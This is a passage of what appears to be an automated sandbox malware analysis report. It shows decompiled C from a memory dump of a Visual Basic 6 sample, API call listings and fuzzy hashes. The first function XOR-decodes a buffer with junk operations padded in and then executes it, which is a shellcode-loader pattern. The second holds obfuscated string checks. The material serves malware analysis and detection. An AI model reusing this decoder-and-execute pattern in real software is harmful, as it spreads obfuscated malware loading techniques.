      					 *_t225 =  *_t225 ^ 0x00000000;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      					 *(_t183 + _t203) =  *(_t183 + _t203) | (0 |  *(_t194 + _t203)) ^ 0x5d4149e9;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      					_t203 = _t203 + 4;
      					 *(_t224 + 0x38) =  *(_t224 + 0x38);
      					 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				} while (_t203 != 0x187bc);
      				 *_t225 =  *_t225;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38);
      				_t184 =  *_t183();
      				asm("clc");
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) ^ 0x00000000;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) + 1;
      				 *(_t224 + 0x38) =  *(_t224 + 0x38) - 1;
      				 *_t225 =  *_t225 ^ 0x00000000;
      				 *_t225 =  *_t225;
      				 *_t225 =  *_t225;
      				asm("cld");
      				return _t184;
      			}












      APIs
      • VirtualAlloc.KERNELBASE(00000000,-000000018F68A153,-F498637D,BC1C0C4C), ref: 004038AC
      Memory Dump Source
      • Source File: 00000000.00000002.819980208.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.819975398.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.819998176.000000000041F000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.820004229.0000000000421000.00000002.00020000.sdmp
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: f354cad6f34d3812c2a6161681f0a14f29e09611d2fa23079f85d391daa17332
      • Instruction ID: 0d389e0dd4553bcb78a89bc41a9d2030d4517d46f30398520ca0dcfebcff0526
      • Opcode Fuzzy Hash: f354cad6f34d3812c2a6161681f0a14f29e09611d2fa23079f85d391daa17332
      • Instruction Fuzzy Hash: 0A8177B6404208ABEBC49E71C5C979E7FB0FF103A9FA66409FC8752591D7B885C98BC1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 55%
      			E0041C424(void* __ebx, void* __edi, void* __esi, signed int _a4) {
      				signed int _v8;
      				signed int _v16;
      				signed int _v20;
      				intOrPtr _v24;
      				intOrPtr _v28;
      				short _v40;
      				void* _v44;
      				void* _v48;
      				void* _v52;
      				short _v56;
      				void* _v60;
      				void* _v64;
      				void* _v68;
      				void* _v72;
      				short _v76;
      				char _v136;
      				intOrPtr _v140;
      				void* _v144;
      				intOrPtr _v148;
      				intOrPtr _v152;
      				signed int _v156;
      				char _v160;
      				char _v164;
      				char _v168;
      				char _v172;
      				signed int _v180;
      				signed int _v188;
      				signed int _v196;
      				char _v204;
      				signed int _v212;
      				char _v220;
      				signed int _v228;
      				char _v236;
      				signed int _v244;
      				signed int _v252;
      				void* _v304;
      				char _v308;
      				intOrPtr _v312;
      				intOrPtr _v316;
      				char _v320;
      				intOrPtr _v324;
      				char _v328;
      				signed int _v332;
      				signed int _v336;
      				void* _v340;
      				signed int _v344;
      				char _v404;
      				signed int _v428;
      				signed int _v432;
      				signed int _v436;
      				intOrPtr* _v440;
      				signed int _v444;
      				signed int _v448;
      				signed int _v452;
      				intOrPtr* _v456;
      				signed int _v460;
      				signed int _v464;
      				intOrPtr* _v468;
      				signed int _v472;
      				signed int _v476;
      				intOrPtr* _v480;
      				signed int _v484;
      				signed int _v488;
      				intOrPtr* _v492;
      				signed int _v496;
      				signed int _v500;
      				intOrPtr* _v504;
      				signed int _v508;
      				signed int _v512;
      				intOrPtr* _v516;
      				signed int _v520;
      				signed int _v524;
      				intOrPtr* _v528;
      				signed int _v532;
      				signed int _v536;
      				signed int _v540;
      				void* _t466;
      				char* _t469;
      				signed int _t471;
      				signed int _t475;
      				signed int _t486;
      				char* _t488;
      				signed int _t489;
      				signed int _t496;
      				signed int* _t500;
      				char* _t503;
      				char* _t504;
      				short _t511;
      				char* _t513;
      				signed int* _t520;
      				char* _t526;
      				signed int _t544;
      				signed int _t549;
      				signed int _t556;
      				void* _t558;
      				char* _t559;
      				signed int _t562;
      				signed int _t570;
      				signed int _t575;
      				signed int _t583;
      				signed int _t588;
      				signed int _t595;
      				signed int _t600;
      				signed int _t607;
      				signed int _t612;
      				signed int _t622;
      				signed int _t627;
      				signed int _t633;
      				signed int _t638;
      				void* _t697;
      				void* _t699;
      				intOrPtr _t700;
      
      				_t700 = _t699 - 0x18;
      				 *[fs:0x0] = _t700;
      				L00401210();
      				_v28 = _t700;
      				_v24 = 0x401120;
      				_v20 = _a4 & 0x00000001;
      				_a4 = _a4 & 0xfffffffe;
      				_v16 = 0;
      				_t466 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401216, _t697);
      				_v8 = 1;
      				_v8 = 2;
      				_push(2);
      				_push(0x403060);
      				_push(0x40306c);
      				L0040138A();
      				L00401390();
      				_push(_t466);
      				_push(0x40306c);
      				_push(0);
      				L00401396();
      				_v332 =  ~(0 | _t466 != 0x00000003);
      				L00401384();
      				if(_v332 != 0) {
      					_v8 = 3;
      					_push(0xffffffff);
      					L0040137E();
      					_v8 = 4;
      					_push(0xffffffff);
      					L0040137E();
      					_v8 = 5;
      					if( *0x41f5f0 != 0) {
      						_v440 = 0x41f5f0;
      					} else {
      						_push(0x41f5f0);
      						_push(0x403090);
      						L00401378();
      						_v440 = 0x41f5f0;
      					}
      					_v332 =  *_v440;
      					_t633 =  *((intOrPtr*)( *_v332 + 0x4c))(_v332,  &_v168);
      					asm("fclex");
      					_v336 = _t633;
      					if(_v336 >= 0) {
      						_v444 = _v444 & 0x00000000;
      					} else {
      						_push(0x4c);
      						_push(0x403080);
      						_push(_v332);
      						_push(_v336);
      						L00401372();
      						_v444 = _t633;
      					}
      					_v340 = _v168;
      					_v244 = _v244 & 0x00000000;
      					_v252 = 2;
      					L00401210();
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					_t638 =  *((intOrPtr*)( *_v340 + 0x2c))(_v340, 0x10);
      					asm("fclex");
      					_v344 = _t638;
      					if(_v344 >= 0) {
      						_v448 = _v448 & 0x00000000;
      					} else {
      						_push(0x2c);
      						_push(0x4030a0);
      						_push(_v340);
      						_push(_v344);
      						L00401372();
      						_v448 = _t638;
      					}
      					L0040136C();
      				}
      				_v8 = 7;
      				_v180 = 0x4b;
      				_v188 = 2;
      				_push( &_v188);
      				_t469 =  &_v204;
      				_push(_t469);
      				L00401360();
      				_push(0x4030b4);
      				_push(0x4030bc);
      				L0040138A();
      				_v212 = _t469;
      				_v220 = 0x8008;
      				_push( &_v204);
      				_t471 =  &_v220;
      				_push(_t471);
      				L00401366();
      				_v332 = _t471;
      				_push( &_v220);
      				_push( &_v204);
      				_push( &_v188);
      				_push(3);
      				L0040135A();
      				_t475 = _v332;
      				if(_t475 != 0) {
      					_v8 = 8;
      					L00401354();
      					_v8 = 9;
      					L0040134E();
      					L00401390();
      					_v8 = 0xa;
      					L00401342();
      					_t489 =  &_v168;
      					L00401348();
      					_v332 = _t489;
      					_v228 = 0x80020004;
      					_v236 = 0xa;
      					_v212 = 0x80020004;
      					_v220 = 0xa;
      					_v196 = 0x80020004;
      					_v204 = 0xa;
      					_v180 = 0x80020004;
      					_v188 = 0xa;
      					_t496 =  *((intOrPtr*)( *_v332 + 0x44))(_v332, 0x291f,  &_v188,  &_v204,  &_v220,  &_v236, _t489, _t475);
      					asm("fclex");
      					_v336 = _t496;
      					if(_v336 >= 0) {
      						_v452 = _v452 & 0x00000000;
      					} else {
      						_push(0x44);
      						_push(0x4030c0);
      						_push(_v332);
      						_push(_v336);
      						L00401372();
      						_v452 = _t496;
      					}
      					L0040136C();
      					_push( &_v236);
      					_push( &_v220);
      					_push( &_v204);
      					_t500 =  &_v188;
      					_push(_t500);
      					_push(4);
      					L0040135A();
      					_v8 = 0xb;
      					_v308 = 0x6317b;
      					L00401336();
      					_push(_t500);
      					_push( &_v160);
      					L0040133C();
      					_push( &_v308);
      					_push(0x297142);
      					_push(L"ANDREWARTHA");
      					_t503 =  &_v164;
      					_push(_t503);
      					L0040133C();
      					_push(_t503);
      					_t504 =  &_v160;
      					_push(_t504);
      					E00402F20();
      					_v312 = _t504;
      					L00401330();
      					_v332 =  ~(0 | _v312 == 0x001b827e);
      					_push( &_v164);
      					_push( &_v160);
      					_push( &_v156);
      					_push(3);
      					L0040132A();
      					_t511 = _v332;
      					if(_t511 != 0) {
      						_v8 = 0xc;
      						_push(0x403114);
      						_push("4:4");
      						L0040138A();
      						L00401390();
      						_push(_t511);
      						_push( &_v188);
      						L0040131E();
      						_push( &_v188);
      						L00401324();
      						L00401390();
      						L00401384();
      						L00401318();
      						_v8 = 0xd;
      						_v180 = 1;
      						_v188 = 2;
      						_push(0xfffffffe);
      						_push(0xfffffffe);
      						_push(0xfffffffe);
      						_push(0xffffffff);
      						_push( &_v188);
      						L00401312();
      						L00401390();
      						L00401318();
      						_v8 = 0xe;
      						_v8 = 0xf;
      						if( *0x41f5f0 != 0) {
      							_v456 = 0x41f5f0;
      						} else {
      							_push(0x41f5f0);
      							_push(0x403090);
      							L00401378();
      							_v456 = 0x41f5f0;
      						}
      						_v332 =  *_v456;
      						_t622 =  *((intOrPtr*)( *_v332 + 0x1c))(_v332,  &_v168);
      						asm("fclex");
      						_v336 = _t622;
      						if(_v336 >= 0) {
      							_v460 = _v460 & 0x00000000;
      						} else {
      							_push(0x1c);
      							_push(0x403080);
      							_push(_v332);
      							_push(_v336);
      							L00401372();
      							_v460 = _t622;
      						}
      						_v340 = _v168;
      						_t627 =  *((intOrPtr*)( *_v340 + 0x64))(_v340, 1,  &_v304);
      						asm("fclex");
      						_v344 = _t627;
      						if(_v344 >= 0) {
      							_v464 = _v464 & 0x00000000;
      						} else {
      							_push(0x64);
      							_push(0x403128);
      							_push(_v340);
      							_push(_v344);
      							L00401372();
      							_v464 = _t627;
      						}
      						_t511 = _v304;
      						_v56 = _t511;
      						L0040136C();
      					}
      					_v8 = 0x11;
      					L00401336();
      					_push(_t511);
      					_push( &_v160);
      					L0040133C();
      					_t513 =  &_v160;
      					_push(_t513);
      					_push(0x83bcf2);
      					_push(0x2ea394);
      					_push(0x59ae9b);
      					_push(0x4f0673);
      					E00402F74();
      					_v308 = _t513;
      					L00401330();
      					_v332 =  ~(0 | _v308 == 0x0066f1e8);
      					_push( &_v160);
      					_push( &_v156);
      					_push(2);
      					L0040132A();
      					if(_v332 != 0) {
      						_v8 = 0x12;
      						if( *0x41f5f0 != 0) {
      							_v468 = 0x41f5f0;
      						} else {
      							_push(0x41f5f0);
      							_push(0x403090);
      							L00401378();
      							_v468 = 0x41f5f0;
      						}
      						_v332 =  *_v468;
      						_t595 =  *((intOrPtr*)( *_v332 + 0x14))(_v332,  &_v168);
      						asm("fclex");
      						_v336 = _t595;
      						if(_v336 >= 0) {
      							_v472 = _v472 & 0x00000000;
      						} else {
      							_push(0x14);
      							_push(0x403080);
      							_push(_v332);
      							_push(_v336);
      							L00401372();
      							_v472 = _t595;
      						}
      						_v340 = _v168;
      						_t600 =  *((intOrPtr*)( *_v340 + 0x60))(_v340,  &_v156);
      						asm("fclex");
      						_v344 = _t600;
      						if(_v344 >= 0) {
      							_v476 = _v476 & 0x00000000;
      						} else {
      							_push(0x60);
      							_push(0x403150);
      							_push(_v340);
      							_push(_v344);
      							L00401372();
      							_v476 = _t600;
      						}
      						_v428 = _v156;
      						_v156 = _v156 & 0x00000000;
      						L00401390();
      						L0040136C();
      						_v8 = 0x13;
      						if( *0x41f5f0 != 0) {
      							_v480 = 0x41f5f0;
      						} else {
      							_push(0x41f5f0);
      							_push(0x403090);
      							L00401378();
      							_v480 = 0x41f5f0;
      						}
      						_v332 =  *_v480;
      						_t607 =  *((intOrPtr*)( *_v332 + 0x14))(_v332,  &_v168);
      						asm("fclex");
      						_v336 = _t607;
      						if(_v336 >= 0) {
      							_v484 = _v484 & 0x00000000;
      						} else {
      							_push(0x14);
      							_push(0x403080);
      							_push(_v332);
      							_push(_v336);
      							L00401372();
      							_v484 = _t607;
      						}
      						_v340 = _v168;
      						_t612 =  *((intOrPtr*)( *_v340 + 0x140))(_v340,  &_v304);
      						asm("fclex");
      						_v344 = _t612;
      						if(_v344 >= 0) {
      							_v488 = _v488 & 0x00000000;
      						} else {
      							_push(0x140);
      							_push(0x403150);
      							_push(_v340);
      							_push(_v344);
      							L00401372();
      							_v488 = _t612;
      						}
      						_v76 = _v304;
      						L0040136C();
      						_v8 = 0x14;
      						L0040130C();
      					}
      					_v8 = 0x16;
      					_push(L"Contangoes3");
      					_t520 =  &_v156;
      					_push(_t520);
      					L0040133C();
      					_push(_t520);
      					E00402FD0();
      					_v308 = _t520;
      					L00401330();
      					_v332 =  ~(0 | _v308 == 0x003c82f5);
      					L00401384();
      					if(_v332 != 0) {
      						_v8 = 0x17;
      						if( *0x41f5f0 != 0) {
      							_v492 = 0x41f5f0;
      						} else {
      							_push(0x41f5f0);
      							_push(0x403090);
      							L00401378();
      							_v492 = 0x41f5f0;
      						}
      						_v332 =  *_v492;
      						_t570 =  *((intOrPtr*)( *_v332 + 0x14))(_v332,  &_v168);
      						asm("fclex");
      						_v336 = _t570;
      						if(_v336 >= 0) {
      							_v496 = _v496 & 0x00000000;
      						} else {
      							_push(0x14);
      							_push(0x403080);
      							_push(_v332);
      							_push(_v336);
      							L00401372();
      							_v496 = _t570;
      						}
      						_v340 = _v168;
      						_t575 =  *((intOrPtr*)( *_v340 + 0x130))(_v340,  &_v156);
      						asm("fclex");
      						_v344 = _t575;
      						if(_v344 >= 0) {
      							_v500 = _v500 & 0x00000000;
      						} else {
      							_push(0x130);
      							_push(0x403150);
      							_push(_v340);
      							_push(_v344);
      							L00401372();
      							_v500 = _t575;
      						}
      						_v432 = _v156;
      						_v156 = _v156 & 0x00000000;
      						L00401390();
      						L0040136C();
      						_v8 = 0x18;
      						_v180 = 2;
      						_v188 = 2;
      						_push( &_v188);
      						L00401306();
      						L00401390();
      						L00401318();
      						_v8 = 0x19;
      						_v8 = 0x1a;
      						if( *0x41f5f0 != 0) {
      							_v504 = 0x41f5f0;
      						} else {
      							_push(0x41f5f0);
      							_push(0x403090);
      							L00401378();
      							_v504 = 0x41f5f0;
      						}
      						_v332 =  *_v504;
      						_t583 =  *((intOrPtr*)( *_v332 + 0x4c))(_v332,  &_v168);
      						asm("fclex");
      						_v336 = _t583;
      						if(_v336 >= 0) {
      							_v508 = _v508 & 0x00000000;
      						} else {
      							_push(0x4c);
      							_push(0x403080);
      							_push(_v332);
      							_push(_v336);
      							L00401372();
      							_v508 = _t583;
      						}
      						_v340 = _v168;
      						_t588 =  *((intOrPtr*)( *_v340 + 0x24))(_v340, L"iliau", L"Lstes8",  &_v156);
      						asm("fclex");
      						_v344 = _t588;
      						if(_v344 >= 0) {
      							_v512 = _v512 & 0x00000000;
      						} else {
      							_push(0x24);
      							_push(0x4030a0);
      							_push(_v340);
      							_push(_v344);
      							L00401372();
      							_v512 = _t588;
      						}
      						_v436 = _v156;
      						_v156 = _v156 & 0x00000000;
      						L00401390();
      						L0040136C();
      					}
      					_v8 = 0x1c;
      					_push( &_v136);
      					_t526 =  &_v404;
      					_push(_t526);
      					_push(0x402e70);
      					L00401300();
      					_push(_t526);
      					E0040302C();
      					_v308 = _t526;
      					L00401330();
      					_push( &_v404);
      					_push( &_v136);
      					_push(0x402e70);
      					L004012FA();
      					_v332 =  ~(0 | _v308 == 0x0028d15d);
      					_push( &_v404);
      					_push(0x402e70);
      					L004012F4();
      					if(_v332 != 0) {
      						_v8 = 0x1d;
      						_v180 = 2;
      						_v188 = 2;
      						_push( &_v188);
      						_push( &_v204);
      						L004012EE();
      						_push( &_v204);
      						L00401324();
      						L00401390();
      						_push( &_v204);
      						_push( &_v188);
      						_push(2);
      						L0040135A();
      						_v8 = 0x1e;
      						if( *0x41f5f0 != 0) {
      							_v516 = 0x41f5f0;
      						} else {
      							_push(0x41f5f0);
      							_push(0x403090);
      							L00401378();
      							_v516 = 0x41f5f0;
      						}
      						_v332 =  *_v516;
      						_t544 =  *((intOrPtr*)( *_v332 + 0x14))(_v332,  &_v168);
      						asm("fclex");
      						_v336 = _t544;
      						if(_v336 >= 0) {
      							_v520 = _v520 & 0x00000000;
      						} else {
      							_push(0x14);
      							_push(0x403080);
      							_push(_v332);
      							_push(_v336);
      							L00401372();
      							_v520 = _t544;
      						}
      						_v340 = _v168;
      						_t549 =  *((intOrPtr*)( *_v340 + 0x78))(_v340,  &_v304);
      						asm("fclex");
      						_v344 = _t549;
      						if(_v344 >= 0) {
      							_v524 = _v524 & 0x00000000;
      						} else {
      							_push(0x78);
      							_push(0x403150);
      							_push(_v340);
      							_push(_v344);
      							L00401372();
      							_v524 = _t549;
      						}
      						_v40 = _v304;
      						L0040136C();
      						_v8 = 0x1f;
      						_v8 = 0x20;
      						if( *0x41f5f0 != 0) {
      							_v528 = 0x41f5f0;
      						} else {
      							_push(0x41f5f0);
      							_push(0x403090);
      							L00401378();
      							_v528 = 0x41f5f0;
      						}
      						_v332 =  *_v528;
      						_t556 =  *((intOrPtr*)( *_v332 + 0x1c))(_v332,  &_v168);
      						asm("fclex");
      						_v336 = _t556;
      						if(_v336 >= 0) {
      							_v532 = _v532 & 0x00000000;
      						} else {
      							_push(0x1c);
      							_push(0x403080);
      							_push(_v332);
      							_push(_v336);
      							L00401372();
      							_v532 = _t556;
      						}
      						_v340 = _v168;
      						_v244 = 1;
      						_v252 = 2;
      						_t558 = 0x10;
      						L00401210();
      						asm("movsd");
      						asm("movsd");
      						asm("movsd");
      						asm("movsd");
      						L004012E8();
      						_t559 =  &_v172;
      						L00401348();
      						_t562 =  *((intOrPtr*)( *_v340 + 0x58))(_v340, _t559, _t559, _t558, _v140, 0x4031a0);
      						asm("fclex");
      						_v344 = _t562;
      						if(_v344 >= 0) {
      							_v536 = _v536 & 0x00000000;
      						} else {
      							_push(0x58);
      							_push(0x403128);
      							_push(_v340);
      							_push(_v344);
      							L00401372();
      							_v536 = _t562;
      						}
      						_push( &_v168);
      						_push( &_v172);
      						_push(2);
      						L004012E2();
      					}
      				}
      				_v8 = 0x23;
      				_v320 = 0x1ee95e40;
      				_v316 = 0x5b03;
      				 *((intOrPtr*)( *_a4 + 0x700))(_a4, L"stretchier",  &_v320, 0x2277,  &_v328);
      				_v152 = _v328;
      				_v148 = _v324;
      				_v8 = 0x24;
      				_t486 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v188);
      				_v332 = _t486;
      				if(_v332 >= 0) {
      					_v540 = _v540 & 0x00000000;
      				} else {
      					_push(0x6f8);
      					_push(0x402da0);
      					_push(_a4);
      					_push(_v332);
      					L00401372();
      					_v540 = _t486;
      				}
      				L00401318();
      				_v20 = 0;
      				_push(0x41d490);
      				_push( &_v404);
      				_push(0x402e70);
      				L004012F4();
      				L00401384();
      				L00401384();
      				L00401384();
      				L00401384();
      				L00401384();
      				L00401384();
      				L00401384();
      				_t488 =  &_v136;
      				_push(_t488);
      				_push(0x402e70);
      				L004012DC();
      				L0040136C();
      				L00401384();
      				return _t488;
      			}


      APIs
      • __vbaChkstk.MSVBVM60(?,00401216), ref: 0041C442
      • __vbaStrCat.MSVBVM60(0040306C,00403060,00000002,?,?,?,?,00401216), ref: 0041C492
      • __vbaStrMove.MSVBVM60(0040306C,00403060,00000002,?,?,?,?,00401216), ref: 0041C49F
      • __vbaInStr.MSVBVM60(00000000,0040306C,00000000,0040306C,00403060,00000002,?,?,?,?,00401216), ref: 0041C4AC
      • __vbaFreeStr.MSVBVM60(00000000,0040306C,00000000,0040306C,00403060,00000002,?,?,?,?,00401216), ref: 0041C4C8
      • __vbaOnError.MSVBVM60(000000FF,00000000,0040306C,00000000,0040306C,00403060,00000002,?,?,?,?,00401216), ref: 0041C4E5
      • __vbaOnError.MSVBVM60(000000FF,000000FF,00000000,0040306C,00000000,0040306C,00403060,00000002,?,?,?,?,00401216), ref: 0041C4F3
      • __vbaNew2.MSVBVM60(00403090,0041F5F0,000000FF,000000FF,00000000,0040306C,00000000,0040306C,00403060,00000002,?,?,?,?,00401216), ref: 0041C512
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,0000004C), ref: 0041C577
      • __vbaChkstk.MSVBVM60(00000000,?,00403080,0000004C), ref: 0041C5AB
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004030A0,0000002C), ref: 0041C5F1
      • __vbaFreeObj.MSVBVM60(00000000,?,004030A0,0000002C), ref: 0041C60B
      • #573.MSVBVM60(?,00000002), ref: 0041C639
      • __vbaStrCat.MSVBVM60(004030BC,004030B4,?,00000002), ref: 0041C648
      • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,004030BC,004030B4,?,00000002), ref: 0041C66B
      • __vbaFreeVarList.MSVBVM60(00000003,00000002,?,00008008,00008008,?,?,?,?,?,004030BC,004030B4,?,00000002), ref: 0041C68E
      • #598.MSVBVM60(?,?,?,00401216), ref: 0041C6AC
      • #611.MSVBVM60(?,?,?,00401216), ref: 0041C6B8
      • __vbaStrMove.MSVBVM60(?,?,?,00401216), ref: 0041C6C2
      • #685.MSVBVM60(?,?,?,00401216), ref: 0041C6CE
      • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,00401216), ref: 0041C6DB
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004030C0,00000044), ref: 0041C78C
      • __vbaFreeObj.MSVBVM60(00000000,?,004030C0,00000044), ref: 0041C7A6
      • __vbaFreeVarList.MSVBVM60(00000004,0000000A,0000000A,0000000A,0000000A), ref: 0041C7C9
      • __vbaStrCopy.MSVBVM60 ref: 0041C7ED
      • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 0041C7FA
      • __vbaStrToAnsi.MSVBVM60(?,ANDREWARTHA,00297142,0006317B,?,00000000), ref: 0041C817
      • __vbaSetSystemError.MSVBVM60(?,00000000,?,ANDREWARTHA,00297142,0006317B,?,00000000), ref: 0041C82F
      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000000,?,ANDREWARTHA,00297142,0006317B,?,00000000), ref: 0041C863
      • __vbaStrCat.MSVBVM60(4:4,00403114,?,?,?,?,?,?,?,?,00000000,?,?,?,00401216), ref: 0041C88B
      • __vbaStrMove.MSVBVM60(4:4,00403114,?,?,?,?,?,?,?,?,00000000,?,?,?,00401216), ref: 0041C898
      • #541.MSVBVM60(?,00000000,4:4,00403114,?,?,?,?,?,?,?,?,00000000), ref: 0041C8A5
      • __vbaStrVarMove.MSVBVM60(?,?,00000000,4:4,00403114,?,?,?,?,?,?,?,?,00000000), ref: 0041C8B1
      • __vbaStrMove.MSVBVM60(?,?,00000000,4:4,00403114,?,?,?,?,?,?,?,?,00000000), ref: 0041C8BE
      • __vbaFreeStr.MSVBVM60(?,?,00000000,4:4,00403114,?,?,?,?,?,?,?,?,00000000), ref: 0041C8C9
      • __vbaFreeVar.MSVBVM60(?,?,00000000,4:4,00403114,?,?,?,?,?,?,?,?,00000000), ref: 0041C8D4
      • #703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041C903
      • __vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041C90D
      • __vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041C918
      • __vbaNew2.MSVBVM60(00403090,0041F5F0,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041C93E
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,0000001C), ref: 0041C9A3
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403128,00000064), ref: 0041CA01
      • __vbaFreeObj.MSVBVM60(00000000,?,00403128,00000064), ref: 0041CA26
      • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00000000,?,?,?,00401216), ref: 0041CA3D
      • __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,00401216), ref: 0041CA4A
      • __vbaSetSystemError.MSVBVM60(004F0673,0059AE9B,002EA394,0083BCF2,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0041CA75
      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041CAA2
      • __vbaNew2.MSVBVM60(00403090,0041F5F0,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0041CAD3
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,00000014), ref: 0041CB38
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403150,00000060), ref: 0041CB94
      • __vbaStrMove.MSVBVM60(00000000,?,00403150,00000060), ref: 0041CBC4
      • __vbaFreeObj.MSVBVM60(00000000,?,00403150,00000060), ref: 0041CBCF
      • __vbaNew2.MSVBVM60(00403090,0041F5F0), ref: 0041CBEE
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,00000014), ref: 0041CC53
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403150,00000140), ref: 0041CCB5
      • __vbaFreeObj.MSVBVM60(00000000,?,00403150,00000140), ref: 0041CCDA
      • __vbaEnd.MSVBVM60(00000000,?,00403150,00000140), ref: 0041CCE6
      • __vbaStrToAnsi.MSVBVM60(?,Contangoes3,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0041CCFE
      • __vbaSetSystemError.MSVBVM60(00000000,?,Contangoes3,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0041CD0F
      • __vbaFreeStr.MSVBVM60(00000000,00000000,Contangoes3), ref: 0041CD32
      • __vbaNew2.MSVBVM60(00403090,0041F5F0), ref: 0041CD60
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,00000014), ref: 0041CDC5
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403150,00000130), ref: 0041CE27
      • __vbaStrMove.MSVBVM60(00000000,?,00403150,00000130), ref: 0041CE57
      • __vbaFreeObj.MSVBVM60(00000000,?,00403150,00000130), ref: 0041CE62
      • #536.MSVBVM60(00000002), ref: 0041CE89
      • __vbaStrMove.MSVBVM60(00000002), ref: 0041CE93
      • __vbaFreeVar.MSVBVM60(00000002), ref: 0041CE9E
      • __vbaNew2.MSVBVM60(00403090,0041F5F0,00000002), ref: 0041CEC4
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,0000004C), ref: 0041CF29
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004030A0,00000024), ref: 0041CF8F
      • __vbaStrMove.MSVBVM60(00000000,?,004030A0,00000024), ref: 0041CFBF
      • __vbaFreeObj.MSVBVM60(00000000,?,004030A0,00000024), ref: 0041CFCA
      • __vbaRecUniToAnsi.MSVBVM60(00402E70,?,?), ref: 0041CFE9
      • __vbaSetSystemError.MSVBVM60(00000000,00402E70,?,?), ref: 0041CFFA
      • __vbaRecAnsiToUni.MSVBVM60(00402E70,?,?,00000000,00402E70,?,?), ref: 0041D012
      • __vbaRecDestructAnsi.MSVBVM60(00402E70,?,00402E70,?,?,00000000,00402E70,?,?), ref: 0041D03B
      • #613.MSVBVM60(?,00000002,00402E70,?,00402E70,?,?,00000000,00402E70,?,?), ref: 0041D078
      • __vbaStrVarMove.MSVBVM60(?,?,00000002,00402E70,?,00402E70,?,?,00000000,00402E70,?,?), ref: 0041D084
      • __vbaStrMove.MSVBVM60(?,?,00000002,00402E70,?,00402E70,?,?,00000000,00402E70,?,?), ref: 0041D08E
      • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,00000002,00402E70,?,00402E70,?,?,00000000,00402E70,?,?), ref: 0041D0A3
      • __vbaNew2.MSVBVM60(00403090,0041F5F0,00000000,?,Contangoes3,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0041D0C5
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,00000014), ref: 0041D12A
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403150,00000078), ref: 0041D186
      • __vbaFreeObj.MSVBVM60(00000000,?,00403150,00000078), ref: 0041D1AB
      • __vbaNew2.MSVBVM60(00403090,0041F5F0), ref: 0041D1D1
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403080,0000001C), ref: 0041D236
      • __vbaChkstk.MSVBVM60(00000000,?,00403080,0000001C), ref: 0041D26D
      • __vbaCastObj.MSVBVM60(?,004031A0), ref: 0041D289
      • __vbaObjSet.MSVBVM60(?,00000000,?,004031A0), ref: 0041D296
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403128,00000058), ref: 0041D2D1
      • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041D2F5
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402DA0,000006F8), ref: 0041D394
      • __vbaFreeVar.MSVBVM60(00000000,?,00402DA0,000006F8), ref: 0041D3AE
      • __vbaRecDestructAnsi.MSVBVM60(00402E70,?,0041D490), ref: 0041D42B
      • __vbaFreeStr.MSVBVM60(00402E70,?,0041D490), ref: 0041D433
      • __vbaFreeStr.MSVBVM60(00402E70,?,0041D490), ref: 0041D43B
      • __vbaFreeStr.MSVBVM60(00402E70,?,0041D490), ref: 0041D443
      • __vbaFreeStr.MSVBVM60(00402E70,?,0041D490), ref: 0041D44B
      • __vbaFreeStr.MSVBVM60(00402E70,?,0041D490), ref: 0041D453
      • __vbaFreeStr.MSVBVM60(00402E70,?,0041D490), ref: 0041D45B
      • __vbaFreeStr.MSVBVM60(00402E70,?,0041D490), ref: 0041D463
      • __vbaRecDestruct.MSVBVM60(00402E70,?,00402E70,?,0041D490), ref: 0041D474
